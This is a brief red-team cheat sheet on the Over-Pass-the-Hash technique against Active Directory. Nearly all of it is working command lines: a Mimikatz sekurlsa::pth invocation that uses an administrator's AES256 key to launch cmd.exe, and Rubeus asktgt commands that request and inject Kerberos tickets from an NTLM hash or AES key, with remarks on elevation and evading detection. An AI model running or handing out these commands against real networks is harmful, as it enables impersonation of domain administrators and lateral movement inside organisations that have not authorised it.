Technique Info

Over Pass The Hash with SafetyKatz.exe (Need Elevation)

MimiKatz.exe "sekurlsa::pth /user:administrator /domain:<ad-domain> /aes256:aes256keys /run: cmd.exe" "exit"

Over Pass The Hash with Rubeus.exe

# no elevation needed
Rubeus.exe asktgt /user:administrator /rc4:<ntlmhash> /ptt
 
# elevation is needed
Rubeus.exe asktgt /user:Administrator /aes256: /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt